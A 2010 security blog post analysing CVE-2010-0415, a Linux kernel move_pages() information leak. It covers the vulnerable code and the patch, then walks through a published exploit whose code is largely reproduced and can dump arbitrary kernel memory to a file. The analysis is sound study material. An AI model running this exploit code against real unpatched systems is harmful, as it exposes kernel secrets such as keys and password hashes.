xorl %eax, %eax

CVE-2010-0415: Linux kernel move_pages(2) Information Leak

with 4 comments

So, this quite interesting vulnerability was discovered by Ramon de Carvalho Valle of IBM (aka. ramon of Rise Security) as we can read in this bug report by Eugene Teo of Red Hat. The bug affects Linux kernel prior to 2.6.33-rc7 and it is located in move_pages(2) system call’s code. This system call is used to move a number of memory pages to a different NUMA node, or to determine the nodes to which those pages are mapped as we can read in its man page. Now, let’s have a look at the vulnerability.
The code for this system call resides in mm/migrate.c and here is the equivalent code snippet from 2.6.32 release of the Linux kernel.

/*
 * Move a list of pages in the address space of the currently executing
 * process.
 */
SYSCALL_DEFINE6(move_pages, pid_t, pid, unsigned long, nr_pages,
                const void __user * __user *, pages,
                const int __user *, nodes,
                int __user *, status, int, flags)
{
        const struct cred *cred = current_cred(), *tcred;
        struct task_struct *task;
        struct mm_struct *mm;
        int err;
    ...
        if (nodes) {
                err = do_pages_move(mm, task, nr_pages, pages, nodes, status,
                                    flags);
        } else {
                err = do_pages_stat(mm, nr_pages, pages, status);
        }
    ...
}

So, ‘nodes’ is a user controlled pointer which will be used to determine what this system call will perform. Unless it’s set to zero it will call do_pages_move() as you can read in the provided code snippet. Let’s move to this routine now…

/*
 * Migrate an array of page address onto an array of nodes and fill
 * the corresponding array of status.
 */
static int do_pages_move(struct mm_struct *mm, struct task_struct *task,
                         unsigned long nr_pages,
                         const void __user * __user *pages,
                         const int __user *nodes,
                         int __user *status, int flags)
{
        struct page_to_node *pm;
        nodemask_t task_nodes;
        unsigned long chunk_nr_pages;
        unsigned long chunk_start;
        int err;
    ...
        /*
         * Store a chunk of page_to_node array in a page,
         * but keep the last one as a marker
         */
        chunk_nr_pages = (PAGE_SIZE / sizeof(struct page_to_node)) - 1;

        for (chunk_start = 0;
             chunk_start < nr_pages;
             chunk_start += chunk_nr_pages) {
    ...
                /* fill the chunk pm with addrs and nodes from user-space */
                for (j = 0; j < chunk_nr_pages; j++) {
                        const void __user *p;
                        int node;
    ...
                        if (get_user(node, nodes + j + chunk_start))
                                goto out_pm;

                        err = -ENODEV;
                        if (!node_state(node, N_HIGH_MEMORY))
                                goto out_pm;

                        err = -EACCES;
                        if (!node_isset(node, task_nodes))
                                goto out_pm;

                        pm[j].node = node;

                }

                /* End marker for this chunk */
                pm[chunk_nr_pages].node = MAX_NUMNODES;
    ...
                /* Return status information */
                for (j = 0; j < chunk_nr_pages; j++)
                        if (put_user(pm[j].status, status + j + chunk_start)) {
                                err = -EFAULT;
                                goto out_pm;
                        }
        }
        err = 0;

out_pm:
        free_page((unsigned long)pm);
out:
        return err;
}

In the above code you can read that the function will initially enter a ‘for’ loop for each chunk and then another one in order to fill the list of pages with the data derived from the user-space. It’s clear that it uses get_user() to obtain the node’s value directly from userspace and it’s using it later on without performing any range checks. The subsequent calls to node_state() and node_isset() will result in the execution of the code located at include/linux/nodemask.h:

extern nodemask_t node_states[NR_NODE_STATES];

#if MAX_NUMNODES > 1
static inline int node_state(int node, enum node_states state)
{
        return node_isset(node, node_states[state]);
}

and…

/* No static inline type checking - see Subtlety (1) above. */
#define node_isset(node, nodemask) test_bit((node), (nodemask).bits)

respectively, and as Eugene Teo noted in his comment:

(The node_isset and node_state functions just map to test_bit, which has no
limiter in the normal implementations.)

Thus the user could request any node value. This will lead to initializing the ‘pm[]’ page’s node value with an arbitrary one which will later be returned to the userspace through put_user() in a ‘for’ loop as you can read in do_pages_move() routine’s code shown earlier. Obviously, this can result in information leak of kernel memory and it was fixed by applying the following patch:

                        err = -ENODEV;
+                       if (node < 0 || node >= MAX_NUMNODES)
+                               goto out_pm;
+
                        if (!node_state(node, N_HIGH_MEMORY))

Which checks that the signed integer ‘node’ is a positive number and doesn’t go beyond the constant ‘MAX_NUMNODES’ which is defined in include/linux/numa.h like this:

#ifdef CONFIG_NODES_SHIFT
#define NODES_SHIFT     CONFIG_NODES_SHIFT
#else
#define NODES_SHIFT     0
#endif

#define MAX_NUMNODES    (1 << NODES_SHIFT)

#endif /* _LINUX_NUMA_H */

At last, let’s move to the more interesting part of the post. The exploitation…
Brad Spengler of grsecurity (aka. spender) wrote and published an exploit code for this vulnerability which is named “exp_sieve.c” and it’s available for download here. He also provides some background information on the discovery of the vulnerability by ramon using his ‘flail’ fuzzer as well as some useful exploitation notes. So…

#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"

#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)

int max_numnodes;

unsigned long node_online_map;

unsigned long node_states;

unsigned long our_base;
unsigned long totalhigh_pages;

#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
      ...
struct exploit_state *exp_state;

char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";

int get_exploit_state_ptr(struct exploit_state *ptr)
{
	exp_state = ptr;
	return 0;
}

int requires_null_page = 0;

As you can see, he uses his exploitation framework (known as enlightenment) in this exploit too. If you’re not familiar with this framework you can just read the ‘exp_framework.h’ header file which has sufficient comments to outline the required functions and structures in order to use that API. For example, get_exploit_state_ptr() should be implemented in order to give access to the ‘exp_state’ structure as you can see above. Next, there are some helper functions…

void addr_to_nodes(unsigned long addr, int *nodes)
{
	int i;
	int min = 0x80000000 / 8;
	int max = 0x7fffffff / 8; 

	if ((addr < (our_base - min)) ||
	    (addr > (our_base + max))) {
		fprintf(stdout, "Error: Unable to dump address %p\n", addr);
		exit(1);
	}

	for (i = 0; i < 8; i++) {
		nodes[i] = ((int)(addr - our_base) << 3) | i;
	}

	return;
}

This function is used to store the address of the ‘nodes’ array for the given address. This will calculate and return the values that would later be used to leak data of the kernel. The next one is:

char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
	int nodes[8];
	int node;
	int status;
	int i;
	int ret;
	unsigned char tmp = 0;

	addr_to_nodes(addr, (int *)&nodes);
	for (i = 0; i < 8; i++) {
		node = nodes[i];
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno != ENODEV)
			tmp |= (1 << i);
	}
	
	return tmp;
}	

This is the actual “exploitation” function that will initialize the ‘nodes[]’ array using the previous function for the provided address represented by ‘addr’ variable. Then, it calls the buggy system call passing the previously calculated ‘node’ values and it will also check the error number returned to determine if the system call is available in the system. If the system call returned without any ‘ENODEV’ (aka. “No Such Device”) error code, it will update the return value of the function.
The next routine is part of the enlightenment framework too and it’s the menu options of the exploit which is pretty simple as you can see here:

void menu(void)
{
	fprintf(stdout, "Enter your choice:\n"
			" [0] Dump via symbol/address with length\n"
			" [1] Dump entire range to file\n"
			" [2] Quit\n");
}

Even though the next routine in the exploit code is the trigger function, we’ll skip this in order to move to the preparation one first. Here is the pre-exploitation function…

int prepare(unsigned char *ptr)
{
	int node;
	int found_gap = 0;
	int i;
	int ret;
	int status;

	totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
	node_states = exp_state->get_kernel_sym("node_states");
	node_online_map = exp_state->get_kernel_sym("node_online_map");

It uses the callback functions of the framework to retrieve some kernel symbols/addresses which in this case are the ‘totalhigh_pages’ which is part of ‘CONFIG_HIGHMEM’ option and it normally contains the total number of high pages, ‘node_states’ that contains the number of node states available and ‘node_online_map’ which contains the ‘N_ONLINE’ value (this one stands for “the node is online”).

	buf = malloc(4096);

	/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
	   towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
	   which will be set for our single node -- this gives us the size of the bitmap
	*/
	for (i = 0; i < 512; i++) {
		node = i;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno == ENODEV) {
			found_gap = 1;
		} else if (found_gap == 1) {
			max_numnodes = i;
			fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
			break;
		}
	}

After allocating 4KB using malloc(3), there's a neat trick to retrieve the size of the bitmap. What spender does is using node values from 0 to 511 and invoking move_pages(2). If the error code returned is 'ENODEV', it means that node_state() failed. If this is the case, then this would be the 'MAX_NUMNODES' value so it updates 'max_numnodes' with this value and breaks out of the loop.

	if (node_online_map != 0)
		our_base = node_online_map;
	/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
	   of each bitmap in the array our base is in the middle of
	   we've taken account for all this
	*/
	else if (node_states != 0)
		our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
	else {
		fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
		exit(1);
	}

	return 0;
}

The final segment of this function will update the 'our_base' variable depending on the HIGHMEM configuration option. As the comment says, this is important since it'll be used to determine the size of each bitmap. Next, if the 'node_states' symbol is non-zero it will update 'our_base' based on the previously retrieved values and addresses to calculate the base address. Otherwise it will simply assume that the kernel isn't vulnerable. Finally, we have the trigger routine which starts like this:

int trigger(void)
{
	unsigned long addr;
	unsigned long addr2;
	unsigned char thebyte;
	unsigned char choice = 0;
	char ibuf[1024];
	char *p;
	FILE *f;

	// get lingering \n
	getchar();
	while (choice != '2') {
		menu();
		fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
		choice = ibuf[0];

So, this is a simple argument parsing 'while' loop that reads the user input using fgets(3) unless it's '2' which stands for "Quit" as we can read in the menu() routine and then a common structure of 'switch-case' statements follows up..

		switch (choice) {
		case '0':
			fprintf(stdout, "Enter the symbol or address for the base:\n");
			fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
			p = strrchr((char *)&ibuf, '\n');
			if (p)
				*p = '\0';

In case the user requested the '0' option (which is the "Dump via symbol/address with length" option), it will read the symbol/address once again using fgets(3) and move on parsing it like this:

			addr = exp_state->get_kernel_sym(ibuf);
			if (addr == 0) {
				addr = strtoul(ibuf, NULL, 16);
			}
			if (addr == 0) {
				fprintf(stdout, "Invalid symbol or address.\n");
				break;
			}
			addr2 = 0;

Using the framework's callback get_kernel_sym() it will attempt to retrieve the symbol. Next, it will request the number of bytes that the user wants to leak like this:

			while (addr2 == 0) {
				fprintf(stdout, "Enter the length of bytes to read in hex:\n");
				fscanf(stdin, "%x", &addr2);
				// get lingering \n
				getchar();
			}
			addr2 += addr;

Nothing really complicated to discuss here. Also, it updates the previously obtained symbol's address to point to the offset that the user set in this step. The following code will use a common loop structure to perform the information leak as you can see here:

			fprintf(stdout, "Leaked bytes:\n");
			while (addr < addr2) {	
				thebyte = get_byte_at_addr(addr);
				printf("%02x ", thebyte);
				addr++;
			}
			printf("\n");
			break;

this will iterate up to the calculated address and attempt to get a byte at each iteration using get_byte_at_addr() and immediately print it out. At last, it will enter a new line character and break of the loop.
If the user selected '1' option (which is "Dump entire range to file" in the exploit's menu), the following code path will be followed:

		case '1':
			addr = our_base -  0x10000000;
#ifdef __x86_64__
			/* 
			   our lower bound will cause us to access
			   bad addresses and cause an oops
			*/
			if (addr < 0xffffffff80000000)
				addr = 0xffffffff80000000;
#else
			if (addr < 0x80000000)
				addr = 0x80000000;
			else if (addr < 0xc0000000)
				addr = 0xc0000000;
#endif

After initializing the address it includes a compile-time pre-processor 'if' clause that will use the appropriate addresses for 64-bit or 32-bit x86 architectures and also, on 32-bit architectures it will check that the caclulated address remain in kernel space range. It'll continue like this:

 
			addr2 = our_base + 0x10000000;
			f = fopen("./kernel.bin", "w");
			if (f == NULL) {
				fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
				exit(1);
			}

It sets the maximum value from the base address which translates to 256MB (0x10000000 in hex.) and opens up a file named "kernel.bin" for writing using fopen(3). Next…

			fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
			fflush(stdout);
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				fputc(thebyte, f);
				if (!(addr % (128 * 1024))) {
					fprintf(stdout, ".");
					fflush(stdout);
				}
				addr++;
			}
			fprintf(stdout, "done.\n");
			fclose(f);
			break;

Iteratively, it will invoke get_byte_at_addr() for the whole 256MB range from base address and simply print it to the previously opened file descriptor. It also displays its progress to the user by printing some dots and when completed a "done." message. Then it will close the file and break the loop. At last, if the selection was '2' which stands for "Quit" it will just break the loop like this:

		case '2':
			break;
		}
	}

	return 0;
}

Finally, the post-exploitation function doesn't contain anything at all since this exploit leaves the kernel in a stable state that doesn't require any post-exploitation actions to take place.

int post(void)
{
	return 0;
}

You can also see this exploit code in action in a video that spender uploaded on youtube which is available here.

P.S.: There might be mistakes in this post since I wrote it really, really quick and didn’t pay the appropriate attention because I didn’t have the time to do so, sorry.

Update:
A couple of minutes after my post spender informed me about some mistakes that my post had. Thanks once again for this and since I don’t have much time, here are his comments in his own words. I’m just copying/pasting them:

Should have shown the definition of node_states, as it would explain why I bother trying to figure out the bitmap size and explains the calculation involving highmem detection; also the range is 512 (256 below the base, 256 above). The node_online_map lookup is for older kernel support; ENODEV means the tested bit was 1, EACCES means it was 0.

Written by xorl

February 25, 2010 at 00:58

Posted in bugs, linux

4 Responses

Subscribe to comments with RSS.

  1. What is the level of threat posed by CVE-2010-0415 vulnerability to Linux Systems;

    vijay

    May 5, 2010 at 13:43

  2. how to deliver the exploit code to the target system ??

    bapine

    May 6, 2010 at 20:59

  3. @bapine: AFAIK this is only locally exploitable meaning that you somehow need to have local access in order to deliver the exploit code to the vulnerable system.

    xorl

    September 13, 2010 at 18:00

  4. @vijay: As in most infoleak vulnerabilities it’s difficult to say it’s level of threat. However, since it could leak large amount of memory it’s possible that this memory dump will contain sensitive information. That is anything from cryptographic keys to even copies of /etc/shadow.

    xorl

    September 13, 2010 at 18:03


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s